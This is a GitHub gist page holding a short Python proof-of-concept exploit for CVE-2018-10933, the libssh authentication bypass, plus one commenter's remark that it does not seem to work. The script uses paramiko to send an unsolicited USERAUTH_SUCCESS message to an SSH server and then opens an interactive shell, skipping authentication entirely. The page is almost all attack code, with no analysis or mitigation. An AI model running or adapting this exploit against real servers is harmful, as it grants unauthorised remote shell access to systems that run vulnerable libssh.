Skip to content

Instantly share code, notes, and snippets.

@catap
Created October 17, 2018 13:46
Show Gist options
  • Save catap/9ebd725184e262d2af7e96a4fc26c4bc to your computer and use it in GitHub Desktop.
Save catap/9ebd725184e262d2af7e96a4fc26c4bc to your computer and use it in GitHub Desktop.
CVE-2018-10933 proof-of-concept by Minh Tuan Luong
import paramiko
import socket
import sys
nbytes = 4096
hostname = "127.0.0.1"
port = 2222
sock = socket.socket()
try:
sock.connect((hostname, port))
m = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(m)
cmd_channel = transport.open_session()
cmd_channel.invoke_shell()
except socket.error:
print '[-] Connecting to host failed. Please check the specified host and port.'
sys.exit(1)
@kevinpostal
Copy link

Does not appear to work

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment